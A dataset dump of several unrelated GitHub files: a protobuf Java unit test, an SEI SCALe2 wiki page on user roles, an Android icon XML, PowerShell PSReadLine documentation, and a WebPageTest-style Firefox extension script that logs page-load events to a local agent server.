text
stringlengths 2
99.9k
| meta
dict |
---|---|
// Protocol Buffers - Google's data interchange format
// Copyright 2008 Google Inc. All rights reserved.
// http://code.google.com/p/protobuf/
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
package com.google.protobuf.test;
import com.google.protobuf.*;
import com.google.protobuf.Descriptors.FieldDescriptor;
import protobuf_unittest.UnittestOptimizeFor.TestOptimizedForSize;
import protobuf_unittest.UnittestProto;
import protobuf_unittest.UnittestProto.ForeignMessage;
import protobuf_unittest.UnittestProto.TestAllExtensions;
import protobuf_unittest.UnittestProto.TestAllTypes;
import protobuf_unittest.UnittestProto.TestPackedTypes;
import protobuf_unittest.UnittestProto.TestRequired;
import protobuf_unittest.UnittestProto.TestRequiredForeign;
import protobuf_unittest.UnittestProto.TestUnpackedTypes;
import junit.framework.TestCase;
import java.util.Map;
/**
* Unit test for {@link AbstractMessage}.
*
* @author [email protected] Kenton Varda
*/
public class AbstractMessageTest extends TestCase {
/**
* Extends AbstractMessage and wraps some other message object. The methods
* of the Message interface which aren't explicitly implemented by
* AbstractMessage are forwarded to the wrapped object. This allows us to
* test that AbstractMessage's implementations work even if the wrapped
* object does not use them.
*/
private static class AbstractMessageWrapper extends AbstractMessage {
private final Message wrappedMessage;
public AbstractMessageWrapper(Message wrappedMessage) {
this.wrappedMessage = wrappedMessage;
}
public Descriptors.Descriptor getDescriptorForType() {
return wrappedMessage.getDescriptorForType();
}
public AbstractMessageWrapper getDefaultInstanceForType() {
return new AbstractMessageWrapper(
wrappedMessage.getDefaultInstanceForType());
}
public Map<Descriptors.FieldDescriptor, Object> getAllFields() {
return wrappedMessage.getAllFields();
}
public boolean hasField(Descriptors.FieldDescriptor field) {
return wrappedMessage.hasField(field);
}
public Object getField(Descriptors.FieldDescriptor field) {
return wrappedMessage.getField(field);
}
public int getRepeatedFieldCount(Descriptors.FieldDescriptor field) {
return wrappedMessage.getRepeatedFieldCount(field);
}
public Object getRepeatedField(
Descriptors.FieldDescriptor field, int index) {
return wrappedMessage.getRepeatedField(field, index);
}
public UnknownFieldSet getUnknownFields() {
return wrappedMessage.getUnknownFields();
}
public Builder newBuilderForType() {
return new Builder(wrappedMessage.newBuilderForType());
}
public Builder toBuilder() {
return new Builder(wrappedMessage.toBuilder());
}
static class Builder extends AbstractMessage.Builder<Builder> {
private final Message.Builder wrappedBuilder;
public Builder(Message.Builder wrappedBuilder) {
this.wrappedBuilder = wrappedBuilder;
}
public AbstractMessageWrapper build() {
return new AbstractMessageWrapper(wrappedBuilder.build());
}
public AbstractMessageWrapper buildPartial() {
return new AbstractMessageWrapper(wrappedBuilder.buildPartial());
}
public Builder clone() {
return new Builder(wrappedBuilder.clone());
}
public boolean isInitialized() {
return clone().buildPartial().isInitialized();
}
public Descriptors.Descriptor getDescriptorForType() {
return wrappedBuilder.getDescriptorForType();
}
public AbstractMessageWrapper getDefaultInstanceForType() {
return new AbstractMessageWrapper(
wrappedBuilder.getDefaultInstanceForType());
}
public Map<Descriptors.FieldDescriptor, Object> getAllFields() {
return wrappedBuilder.getAllFields();
}
public Builder newBuilderForField(Descriptors.FieldDescriptor field) {
return new Builder(wrappedBuilder.newBuilderForField(field));
}
public boolean hasField(Descriptors.FieldDescriptor field) {
return wrappedBuilder.hasField(field);
}
public Object getField(Descriptors.FieldDescriptor field) {
return wrappedBuilder.getField(field);
}
public Builder setField(Descriptors.FieldDescriptor field, Object value) {
wrappedBuilder.setField(field, value);
return this;
}
public Builder clearField(Descriptors.FieldDescriptor field) {
wrappedBuilder.clearField(field);
return this;
}
public int getRepeatedFieldCount(Descriptors.FieldDescriptor field) {
return wrappedBuilder.getRepeatedFieldCount(field);
}
public Object getRepeatedField(
Descriptors.FieldDescriptor field, int index) {
return wrappedBuilder.getRepeatedField(field, index);
}
public Builder setRepeatedField(Descriptors.FieldDescriptor field,
int index, Object value) {
wrappedBuilder.setRepeatedField(field, index, value);
return this;
}
public Builder addRepeatedField(
Descriptors.FieldDescriptor field, Object value) {
wrappedBuilder.addRepeatedField(field, value);
return this;
}
public UnknownFieldSet getUnknownFields() {
return wrappedBuilder.getUnknownFields();
}
public Builder setUnknownFields(UnknownFieldSet unknownFields) {
wrappedBuilder.setUnknownFields(unknownFields);
return this;
}
@Override
public Message.Builder getFieldBuilder(FieldDescriptor field) {
return wrappedBuilder.getFieldBuilder(field);
}
}
public Parser<? extends Message> getParserForType() {
return wrappedMessage.getParserForType();
}
}
// =================================================================
TestUtil.ReflectionTester reflectionTester =
new TestUtil.ReflectionTester(TestAllTypes.getDescriptor(), null);
TestUtil.ReflectionTester extensionsReflectionTester =
new TestUtil.ReflectionTester(TestAllExtensions.getDescriptor(),
TestUtil.getExtensionRegistry());
public void testClear() throws Exception {
AbstractMessageWrapper message =
new AbstractMessageWrapper.Builder(
TestAllTypes.newBuilder(TestUtil.getAllSet()))
.clear().build();
TestUtil.assertClear((TestAllTypes) message.wrappedMessage);
}
public void testCopy() throws Exception {
AbstractMessageWrapper message =
new AbstractMessageWrapper.Builder(TestAllTypes.newBuilder())
.mergeFrom(TestUtil.getAllSet()).build();
TestUtil.assertAllFieldsSet((TestAllTypes) message.wrappedMessage);
}
public void testSerializedSize() throws Exception {
TestAllTypes message = TestUtil.getAllSet();
Message abstractMessage = new AbstractMessageWrapper(TestUtil.getAllSet());
assertEquals(message.getSerializedSize(),
abstractMessage.getSerializedSize());
}
public void testSerialization() throws Exception {
Message abstractMessage = new AbstractMessageWrapper(TestUtil.getAllSet());
TestUtil.assertAllFieldsSet(
TestAllTypes.parseFrom(abstractMessage.toByteString()));
assertEquals(TestUtil.getAllSet().toByteString(),
abstractMessage.toByteString());
}
public void testParsing() throws Exception {
AbstractMessageWrapper.Builder builder =
new AbstractMessageWrapper.Builder(TestAllTypes.newBuilder());
AbstractMessageWrapper message =
builder.mergeFrom(TestUtil.getAllSet().toByteString()).build();
TestUtil.assertAllFieldsSet((TestAllTypes) message.wrappedMessage);
}
public void testParsingUninitialized() throws Exception {
TestRequiredForeign.Builder builder = TestRequiredForeign.newBuilder();
builder.getOptionalMessageBuilder().setDummy2(10);
ByteString bytes = builder.buildPartial().toByteString();
Message.Builder abstractMessageBuilder =
new AbstractMessageWrapper.Builder(TestRequiredForeign.newBuilder());
// mergeFrom() should not throw initialization error.
abstractMessageBuilder.mergeFrom(bytes).buildPartial();
try {
abstractMessageBuilder.mergeFrom(bytes).build();
fail();
} catch (UninitializedMessageException ex) {
// pass
}
// test DynamicMessage directly.
Message.Builder dynamicMessageBuilder = DynamicMessage.newBuilder(
TestRequiredForeign.getDescriptor());
// mergeFrom() should not throw initialization error.
dynamicMessageBuilder.mergeFrom(bytes).buildPartial();
try {
dynamicMessageBuilder.mergeFrom(bytes).build();
fail();
} catch (UninitializedMessageException ex) {
// pass
}
}
public void testPackedSerialization() throws Exception {
Message abstractMessage =
new AbstractMessageWrapper(TestUtil.getPackedSet());
TestUtil.assertPackedFieldsSet(
TestPackedTypes.parseFrom(abstractMessage.toByteString()));
assertEquals(TestUtil.getPackedSet().toByteString(),
abstractMessage.toByteString());
}
public void testPackedParsing() throws Exception {
AbstractMessageWrapper.Builder builder =
new AbstractMessageWrapper.Builder(TestPackedTypes.newBuilder());
AbstractMessageWrapper message =
builder.mergeFrom(TestUtil.getPackedSet().toByteString()).build();
TestUtil.assertPackedFieldsSet((TestPackedTypes) message.wrappedMessage);
}
public void testUnpackedSerialization() throws Exception {
Message abstractMessage =
new AbstractMessageWrapper(TestUtil.getUnpackedSet());
TestUtil.assertUnpackedFieldsSet(
TestUnpackedTypes.parseFrom(abstractMessage.toByteString()));
assertEquals(TestUtil.getUnpackedSet().toByteString(),
abstractMessage.toByteString());
}
public void testParsePackedToUnpacked() throws Exception {
AbstractMessageWrapper.Builder builder =
new AbstractMessageWrapper.Builder(TestUnpackedTypes.newBuilder());
AbstractMessageWrapper message =
builder.mergeFrom(TestUtil.getPackedSet().toByteString()).build();
TestUtil.assertUnpackedFieldsSet(
(TestUnpackedTypes) message.wrappedMessage);
}
public void testParseUnpackedToPacked() throws Exception {
AbstractMessageWrapper.Builder builder =
new AbstractMessageWrapper.Builder(TestPackedTypes.newBuilder());
AbstractMessageWrapper message =
builder.mergeFrom(TestUtil.getUnpackedSet().toByteString()).build();
TestUtil.assertPackedFieldsSet((TestPackedTypes) message.wrappedMessage);
}
public void testUnpackedParsing() throws Exception {
AbstractMessageWrapper.Builder builder =
new AbstractMessageWrapper.Builder(TestUnpackedTypes.newBuilder());
AbstractMessageWrapper message =
builder.mergeFrom(TestUtil.getUnpackedSet().toByteString()).build();
TestUtil.assertUnpackedFieldsSet(
(TestUnpackedTypes) message.wrappedMessage);
}
public void testOptimizedForSize() throws Exception {
// We're mostly only checking that this class was compiled successfully.
TestOptimizedForSize message =
TestOptimizedForSize.newBuilder().setI(1).build();
message = TestOptimizedForSize.parseFrom(message.toByteString());
assertEquals(2, message.getSerializedSize());
}
// -----------------------------------------------------------------
// Tests for isInitialized().
private static final TestRequired TEST_REQUIRED_UNINITIALIZED =
TestRequired.getDefaultInstance();
private static final TestRequired TEST_REQUIRED_INITIALIZED =
TestRequired.newBuilder().setA(1).setB(2).setC(3).build();
public void testIsInitialized() throws Exception {
TestRequired.Builder builder = TestRequired.newBuilder();
AbstractMessageWrapper.Builder abstractBuilder =
new AbstractMessageWrapper.Builder(builder);
assertFalse(abstractBuilder.isInitialized());
assertEquals("a, b, c", abstractBuilder.getInitializationErrorString());
builder.setA(1);
assertFalse(abstractBuilder.isInitialized());
assertEquals("b, c", abstractBuilder.getInitializationErrorString());
builder.setB(1);
assertFalse(abstractBuilder.isInitialized());
assertEquals("c", abstractBuilder.getInitializationErrorString());
builder.setC(1);
assertTrue(abstractBuilder.isInitialized());
assertEquals("", abstractBuilder.getInitializationErrorString());
}
public void testForeignIsInitialized() throws Exception {
TestRequiredForeign.Builder builder = TestRequiredForeign.newBuilder();
AbstractMessageWrapper.Builder abstractBuilder =
new AbstractMessageWrapper.Builder(builder);
assertTrue(abstractBuilder.isInitialized());
assertEquals("", abstractBuilder.getInitializationErrorString());
builder.setOptionalMessage(TEST_REQUIRED_UNINITIALIZED);
assertFalse(abstractBuilder.isInitialized());
assertEquals(
"optional_message.a, optional_message.b, optional_message.c",
abstractBuilder.getInitializationErrorString());
builder.setOptionalMessage(TEST_REQUIRED_INITIALIZED);
assertTrue(abstractBuilder.isInitialized());
assertEquals("", abstractBuilder.getInitializationErrorString());
builder.addRepeatedMessage(TEST_REQUIRED_UNINITIALIZED);
assertFalse(abstractBuilder.isInitialized());
assertEquals(
"repeated_message[0].a, repeated_message[0].b, repeated_message[0].c",
abstractBuilder.getInitializationErrorString());
builder.setRepeatedMessage(0, TEST_REQUIRED_INITIALIZED);
assertTrue(abstractBuilder.isInitialized());
assertEquals("", abstractBuilder.getInitializationErrorString());
}
// -----------------------------------------------------------------
// Tests for mergeFrom
static final TestAllTypes MERGE_SOURCE =
TestAllTypes.newBuilder()
.setOptionalInt32(1)
.setOptionalString("foo")
.setOptionalForeignMessage(ForeignMessage.getDefaultInstance())
.addRepeatedString("bar")
.build();
static final TestAllTypes MERGE_DEST =
TestAllTypes.newBuilder()
.setOptionalInt64(2)
.setOptionalString("baz")
.setOptionalForeignMessage(ForeignMessage.newBuilder().setC(3).build())
.addRepeatedString("qux")
.build();
static final String MERGE_RESULT_TEXT =
"optional_int32: 1\n" +
"optional_int64: 2\n" +
"optional_string: \"foo\"\n" +
"optional_foreign_message {\n" +
" c: 3\n" +
"}\n" +
"repeated_string: \"qux\"\n" +
"repeated_string: \"bar\"\n";
public void testMergeFrom() throws Exception {
AbstractMessageWrapper result =
new AbstractMessageWrapper.Builder(
TestAllTypes.newBuilder(MERGE_DEST))
.mergeFrom(MERGE_SOURCE).build();
assertEquals(MERGE_RESULT_TEXT, result.toString());
}
// -----------------------------------------------------------------
// Tests for equals and hashCode
public void testEqualsAndHashCode() throws Exception {
TestAllTypes a = TestUtil.getAllSet();
TestAllTypes b = TestAllTypes.newBuilder().build();
TestAllTypes c = TestAllTypes.newBuilder(b).addRepeatedString("x").build();
TestAllTypes d = TestAllTypes.newBuilder(c).addRepeatedString("y").build();
TestAllExtensions e = TestUtil.getAllExtensionsSet();
TestAllExtensions f = TestAllExtensions.newBuilder(e)
.addExtension(UnittestProto.repeatedInt32Extension, 999).build();
checkEqualsIsConsistent(a);
checkEqualsIsConsistent(b);
checkEqualsIsConsistent(c);
checkEqualsIsConsistent(d);
checkEqualsIsConsistent(e);
checkEqualsIsConsistent(f);
checkNotEqual(a, b);
checkNotEqual(a, c);
checkNotEqual(a, d);
checkNotEqual(a, e);
checkNotEqual(a, f);
checkNotEqual(b, c);
checkNotEqual(b, d);
checkNotEqual(b, e);
checkNotEqual(b, f);
checkNotEqual(c, d);
checkNotEqual(c, e);
checkNotEqual(c, f);
checkNotEqual(d, e);
checkNotEqual(d, f);
checkNotEqual(e, f);
// Deserializing into the TestEmptyMessage such that every field
// is an {@link UnknownFieldSet.Field}.
UnittestProto.TestEmptyMessage eUnknownFields =
UnittestProto.TestEmptyMessage.parseFrom(e.toByteArray());
UnittestProto.TestEmptyMessage fUnknownFields =
UnittestProto.TestEmptyMessage.parseFrom(f.toByteArray());
checkNotEqual(eUnknownFields, fUnknownFields);
checkEqualsIsConsistent(eUnknownFields);
checkEqualsIsConsistent(fUnknownFields);
// Subsequent reconstitutions should be identical
UnittestProto.TestEmptyMessage eUnknownFields2 =
UnittestProto.TestEmptyMessage.parseFrom(e.toByteArray());
checkEqualsIsConsistent(eUnknownFields, eUnknownFields2);
}
/**
* Asserts that the given proto has symmetric equals and hashCode methods.
*/
private void checkEqualsIsConsistent(Message message) {
// Object should be equal to itself.
assertEquals(message, message);
// Object should be equal to a dynamic copy of itself.
DynamicMessage dynamic = DynamicMessage.newBuilder(message).build();
checkEqualsIsConsistent(message, dynamic);
}
/**
* Asserts that the given protos are equal and have the same hash code.
*/
private void checkEqualsIsConsistent(Message message1, Message message2) {
assertEquals(message1, message2);
assertEquals(message2, message1);
assertEquals(message2.hashCode(), message1.hashCode());
}
/**
* Asserts that the given protos are not equal and have different hash codes.
*
* @warning It's valid for non-equal objects to have the same hash code, so
* this test is stricter than it needs to be. However, this should happen
* relatively rarely.
*/
private void checkNotEqual(Message m1, Message m2) {
String equalsError = String.format("%s should not be equal to %s", m1, m2);
assertFalse(equalsError, m1.equals(m2));
assertFalse(equalsError, m2.equals(m1));
assertFalse(
String.format("%s should have a different hash code from %s", m1, m2),
m1.hashCode() == m2.hashCode());
}
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<title>SCALe2 : User Roles</title>
<link rel="stylesheet" href="styles/site.css" type="text/css" />
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body class="theme-default aui-theme-default">
<div id="page">
<div id="main" class="aui-page-panel">
<div id="main-header">
<div id="breadcrumb-section">
<ol id="breadcrumbs">
<li class="first">
<span><a href="index.html">SCALe2</a></span>
</li>
<li>
<span><a href="SCALe2-Home_215846573.html">SCALe2 Home</a></span>
</li>
<li>
<span><a href="215846575.html">Source Code Analysis Lab (SCALe)</a></span>
</li>
</ol>
</div>
<h1 id="title-heading" class="pagetitle">
<span id="title-text">
SCALe2 : User Roles
</span>
</h1>
</div>
<div id="content" class="view">
<div class="page-metadata">
Created by <span class='author'> Wiki Administrator</span> on Dec 04, 2017
</div>
<div id="main-content" class="wiki-content group">
<p>The SCALe process involves developers, analysts, auditors, and administrators. The number of people performing each role is variable. For example, the SCALe process can be done by a single person performing all roles or by a large organization with teams of people for each role.</p><h3 id="UserRoles-Developers">Developers</h3><p>Developers are responsible for fixing any <a href="Terms-and-Definitions_215846944.html#TermsandDefinitions-vulnerability">vulnerabilities</a> found in the software, and they serve as the foremost authorities on the software's <a href="Terms-and-Definitions_215846944.html#TermsandDefinitions-implementation">implementation</a>. They also are responsible for providing the source code (to be analyzed) to the SCALe app.</p><h3 id="UserRoles-Analysts">Analysts</h3><p>Analysts are responsible for running appropriate <a href="Terms-and-Definitions_215846944.html#TermsandDefinitions-staticanalysis">static analysis</a> tools on the software. They may rely on the developers for wisdom about properly building the software. Analysts are responsible for providing tool output to the SCALe<strong> <span style="color: rgb(255,0,0);"> </span> </strong>app.</p><h3 id="UserRoles-Auditors">Auditors</h3><p>Auditors evaluate diagnostics, deciding which are confirmed violations and which are false positives. In this role, they are the primary users of the SCALe app. To correctly evaluate diagnostics, auditors must be familiar with the SEI CERT Coding Standards. These are available on the <a class="unresolved" href="#">web</a>, and the <img class="emoticon emoticon-light-on" src="images/icons/emoticons/lightbulb_on.png" data-emoticon-name="light-on" alt="(lightbulb)"/> <span style="color: rgb(0,128,0);"> <a href="http://www.cert.org/secure-coding/publications/books/cert-c-coding-standard-second-edition.cfm" class="external-link" rel="nofollow"> <span style="color: rgb(0,128,0);">C</span> </a> </span> and <img class="emoticon emoticon-light-on" src="images/icons/emoticons/lightbulb_on.png" data-emoticon-name="light-on" alt="(lightbulb)"/> <span style="color: rgb(0,128,0);"> <a href="http://www.cert.org/secure-coding/publications/books/cert-oracle-secure-coding-standard-for-java.cfm" class="external-link" rel="nofollow"> <span style="color: rgb(0,128,0);">Java</span> </a> </span> standards have been published by Addison-Wesley. CERT also offers courses in <img class="emoticon emoticon-light-on" src="images/icons/emoticons/lightbulb_on.png" data-emoticon-name="light-on" alt="(lightbulb)"/> <a href="http://www.sei.cmu.edu/training/P63.cfm" class="external-link" rel="nofollow"> <span style="color: rgb(0,128,0);">C and C++</span> </a> and Java for secure coding.</p><h3 id="UserRoles-Administrator">Administrator</h3><p>The administrator is responsible for installing and maintaining the SCALe app as well as any tools required by the analysts. The host running the SCALe app need not be directly accessed by anyone except the administrator.</p><p> </p><hr/><p><a href="System-Requirements_215846591.html"><span class="confluence-embedded-file-wrapper"><img class="confluence-embedded-image" src="attachments/216826567/216826568.png" data-image-src="https://wiki-int.sei.cmu.edu/confluence/download/attachments/216826567/button_arrow_left.png?version=1&modificationDate=1513017863440&api=v2" data-unresolved-comment-count="0" data-linked-resource-id="216826568" data-linked-resource-version="1" data-linked-resource-type="attachment" data-linked-resource-default-alias="button_arrow_left.png" data-base-url="https://wiki-int.sei.cmu.edu/confluence" data-linked-resource-content-type="image/png" data-linked-resource-container-id="216826567" data-linked-resource-container-version="3"></span></a> <a href="215846575.html"><span class="confluence-embedded-file-wrapper"><img class="confluence-embedded-image" src="attachments/216826567/216826570.png" data-image-src="https://wiki-int.sei.cmu.edu/confluence/download/attachments/216826567/button_arrow_up.png?version=1&modificationDate=1513017872173&api=v2" data-unresolved-comment-count="0" data-linked-resource-id="216826570" data-linked-resource-version="1" data-linked-resource-type="attachment" data-linked-resource-default-alias="button_arrow_up.png" data-base-url="https://wiki-int.sei.cmu.edu/confluence" data-linked-resource-content-type="image/png" data-linked-resource-container-id="216826567" data-linked-resource-container-version="3"></span></a> <a href="Installing-SCALe_215846594.html"><span class="confluence-embedded-file-wrapper"><img class="confluence-embedded-image" src="attachments/216826567/216826569.png" data-image-src="https://wiki-int.sei.cmu.edu/confluence/download/attachments/216826567/button_arrow_right.png?version=1&modificationDate=1513017872170&api=v2" data-unresolved-comment-count="0" data-linked-resource-id="216826569" data-linked-resource-version="1" data-linked-resource-type="attachment" data-linked-resource-default-alias="button_arrow_right.png" data-base-url="https://wiki-int.sei.cmu.edu/confluence" data-linked-resource-content-type="image/png" data-linked-resource-container-id="216826567" data-linked-resource-container-version="3"></span></a></p><p> </p>
</div>
</div> </div>
<div id="footer" role="contentinfo">
<section class="footer-body">
<p>Document generated by Confluence on Aug 14, 2018 13:43</p>
<div id="footer-logo"><a href="http://www.atlassian.com/">Atlassian</a></div>
</section>
</div>
</div> </body>
</html>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<adaptive-icon xmlns:android="http://schemas.android.com/apk/res/android">
<background android:drawable="@drawable/ic_launcher_background" />
<foreground android:drawable="@drawable/ic_launcher_foreground" />
</adaptive-icon> | {
"pile_set_name": "Github"
} |
---
external help file: Microsoft.PowerShell.PSReadLine2.dll-Help.xml
keywords: powershell,cmdlet
Locale: en-US
Module Name: PSReadLine
ms.date: 12/07/2018
online version: https://docs.microsoft.com/powershell/module/psreadline/remove-psreadlinekeyhandler?view=powershell-6&WT.mc_id=ps-gethelp
schema: 2.0.0
title: Remove-PSReadLineKeyHandler
---
# Remove-PSReadLineKeyHandler
## SYNOPSIS
Removes a key binding.
## SYNTAX
```
Remove-PSReadLineKeyHandler [-Chord] <String[]> [-ViMode <ViMode>] [<CommonParameters>]
```
## DESCRIPTION
The `Remove-PSReadLineKeyHandler` cmdlet removes a specified key binding.
## EXAMPLES
### Example 1: Remove a binding
```powershell
Remove-PSReadLineKeyHandler -Chord Ctrl+B
```
This command removes the binding from the key combination, or chord, `Ctrl+B`. The `Ctrl+B` chord is
created in the `Set-PSReadLineKeyHandler` article.
## PARAMETERS
### -Chord
Specifies an array of keys or sequences of keys to be removed. A single binding is specified by
using a single string. If the binding is a sequence of keys, separate the keys by a comma, as in
the following example:
`Ctrl+x,Ctrl+l`
This parameter accepts an array of strings. Each string is a separate binding, not a sequence of
keys for a single binding.
```yaml
Type: System.String[]
Parameter Sets: (All)
Aliases: Key
Required: True
Position: 0
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -ViMode
Specify which vi mode the binding applies to. Possible values are: Insert, Command.
```yaml
Type: Microsoft.PowerShell.ViMode
Parameter Sets: (All)
Aliases:
Accepted values: Insert, Command
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### CommonParameters
This cmdlet supports the common parameters: -Debug, -ErrorAction, -ErrorVariable,
-InformationAction, -InformationVariable, -OutVariable, -OutBuffer, -PipelineVariable, -Verbose,
-WarningAction, and -WarningVariable. For more information, see
[about_CommonParameters](http://go.microsoft.com/fwlink/?LinkID=113216).
## INPUTS
### None
You cannot pipe objects to this cmdlet.
## OUTPUTS
### None
## NOTES
## RELATED LINKS
[Get-PSReadLineKeyHandler](Get-PSReadLineKeyHandler.md)
[Get-PSReadLineOption](Get-PSReadLineOption.md)
[Set-PSReadLineOption](Set-PSReadLineOption.md)
[Set-PSReadLineKeyHandler](Set-PSReadLineKeyHandler.md)
| {
"pile_set_name": "Github"
} |
var SERVER = "http://127.0.0.1:8888/";
var messages = '';
var message_timer = undefined;
var last_send = undefined;
var blockingWebRequest = false;
var block = [];
var block_domains = [];
var block_domains_except = [];
var headers = {};
var overrideHosts = {};
var send_messages = function() {
message_timer = undefined;
last_send = performance.now();
message_headers = new Headers({
"Content-Type": "application/json",
"Content-Length": messages.length.toString()
});
fetch(SERVER + 'messages',
{method: 'POST', headers: message_headers, body: messages});
messages = '';
};
var send_message = function(event, body = undefined) {
message = {path: event}
if (body !== undefined)
message['body'] = body;
messages += JSON.stringify(message) + "\n";
if (message_timer == undefined) {
elapsed = 1000;
if (last_send !== undefined)
elapsed = performance.now() - last_send;
if (elapsed > 500) {
send_messages();
} else {
delay = Math.max(1, Math.min(500 - elapsed, 500));
message_timer = setTimeout(send_messages, delay);
}
}
};
browser.runtime.onMessage.addListener(data => {
if (data.msg == 'longTask') {
send_message('wptagent.longTask', {dur: data.dur, ts: performance.now()});
}
});
var log = function(message) {
message_headers = new Headers({
"Content-Type": "application/json",
"Content-Length": message.length.toString()
});
fetch(SERVER + 'log',
{method: 'POST', headers: message_headers, body: message});
};
function get_domain(url) {
var domain;
if (url.indexOf("://") > -1) {
domain = url.split('/')[2];
} else {
domain = url.split('/')[0];
}
domain = domain.split(':')[0];
domain = domain.split('?')[0];
return domain;
}
function blockRequest(details) {
var ret = {cancel: false}
if (!details.url.startsWith(SERVER)) {
var domain = get_domain(details.url);
for (var i = 0; i < block.length; i++) {
if (details.url.indexOf(block[i]) !== -1) {
ret.cancel = true;
break;
}
}
if (!ret.cancel && block_domains.length > 0) {
for (var i = 0; i < block_domains.length; i++) {
if (domain == block_domains[i]) {
ret.cancel = true;
break;
}
}
}
if (!ret.cancel && block_domains_except.length > 0) {
if (!block_domains_except.includes(domain)) {
ret.cancel = true;
}
}
}
return ret;
}
function addHeaders(details) {
if (!details.url.startsWith(SERVER)) {
for (name in headers) {
for (var i = 0; i < details.requestHeaders.length; ++i) {
if (details.requestHeaders[i].name === name) {
details.requestHeaders.splice(i, 1);
break;
}
}
details.requestHeaders.push({'name': name, 'value': headers[name]})
}
var url = new URL(details.url);
for (host in overrideHosts) {
if (host == url.hostname) {
for (var i = 0; i < details.requestHeaders.length; ++i) {
if (details.requestHeaders[i].name === 'Host') {
details.requestHeaders.splice(i, 1);
break;
}
}
details.requestHeaders.push({'name': 'Host', 'value': overrideHosts[host]})
details.requestHeaders.push({'name': 'x-Host', 'value': host})
}
}
}
return {requestHeaders: details.requestHeaders};
}
var installBlockingHandler = function() {
if (!blockingWebRequest) {
blockingWebRequest = true;
browser.webRequest.onBeforeRequest.addListener(blockRequest, {urls: ["<all_urls>"]}, ["blocking"]);
browser.webRequest.onBeforeSendHeaders.addListener(addHeaders, {urls: ["<all_urls>"]}, ["blocking", "requestHeaders"]);
}
};
// Get the config from wptagent
fetch(SERVER + 'config').then(function(response) {
if (response.ok) {
response.json().then(function(data) {
if (data['block'] != undefined) {
block = data['block'];
}
if (data['block_domains'] != undefined) {
block_domains = data['block_domains'];
}
if (data['block_domains_except'] != undefined) {
block_domains_except = data['block_domains_except'];
}
if (data['headers'] != undefined) {
headers = data['headers'];
}
if (data['overrideHosts'] != undefined) {
overrideHosts = data['overrideHosts'];
}
if (data['cookies'] != undefined) {
for (var i = 0; i < data['cookies'].length; i++) {
try {
browser.cookies.set(data['cookies'][i]);
} catch(e) {
}
}
}
if (block.length ||
block_domains.length ||
block_domains_except.length ||
Object.keys(headers).length ||
Object.keys(overrideHosts).length) {
installBlockingHandler();
}
// Let wptagent know we started
send_message('wptagent.started', {ts: performance.now()});
});
}
});
// Navigation handlers
browser.webNavigation.onBeforeNavigate.addListener(details => {
if (!details.url.startsWith(SERVER))
send_message('webNavigation.onBeforeNavigate', details);
}, {
url: [{schemes: ["http", "https"]}]}
);
browser.webNavigation.onCommitted.addListener(details => {
if (!details.url.startsWith(SERVER))
send_message('webNavigation.onCommitted', details);
}, {
url: [{schemes: ["http", "https"]}]}
);
browser.webNavigation.onDOMContentLoaded.addListener(details => {
if (!details.url.startsWith(SERVER))
send_message('webNavigation.onDOMContentLoaded', details);
}, {
url: [{schemes: ["http", "https"]}]}
);
browser.webNavigation.onCompleted.addListener(details => {
if (!details.url.startsWith(SERVER))
send_message('webNavigation.onCompleted', details);
}, {
url: [{schemes: ["http", "https"]}]}
);
browser.webNavigation.onErrorOccurred.addListener(details => {
if (!details.url.startsWith(SERVER))
send_message('webNavigation.onErrorOccurred', details);
}, {
url: [{schemes: ["http", "https"]}]}
);
// Request handlers
browser.webRequest.onBeforeRequest.addListener(details => {
if (!details.url.startsWith(SERVER))
send_message('webRequest.onBeforeRequest', details);
}, {urls: ["<all_urls>"]});
browser.webRequest.onSendHeaders.addListener(details => {
if (!details.url.startsWith(SERVER))
send_message('webRequest.onSendHeaders', details);
}, {urls: ["<all_urls>"]}, ["requestHeaders"]);
browser.webRequest.onHeadersReceived.addListener(details => {
if (!details.url.startsWith(SERVER))
send_message('webRequest.onHeadersReceived', details);
}, {urls: ["<all_urls>"]}, ["responseHeaders"]);
browser.webRequest.onResponseStarted.addListener(details => {
if (!details.url.startsWith(SERVER))
send_message('webRequest.onResponseStarted', details);
}, {urls: ["<all_urls>"]}, ["responseHeaders"]);
browser.webRequest.onBeforeRedirect.addListener(details => {
if (!details.url.startsWith(SERVER))
send_message('webRequest.onBeforeRedirect', details);
}, {urls: ["<all_urls>"]}, ["responseHeaders"]);
browser.webRequest.onCompleted.addListener(details => {
if (!details.url.startsWith(SERVER))
send_message('webRequest.onCompleted', details);
}, {urls: ["<all_urls>"]}, ["responseHeaders"]);
browser.webRequest.onErrorOccurred.addListener(details => {
if (!details.url.startsWith(SERVER))
send_message('webRequest.onErrorOccurred', details);
}, {urls: ["<all_urls>"]});
| {
"pile_set_name": "Github"
} |
import os
import platform
import subprocess
import time
from setuptools import Extension, dist, find_packages, setup
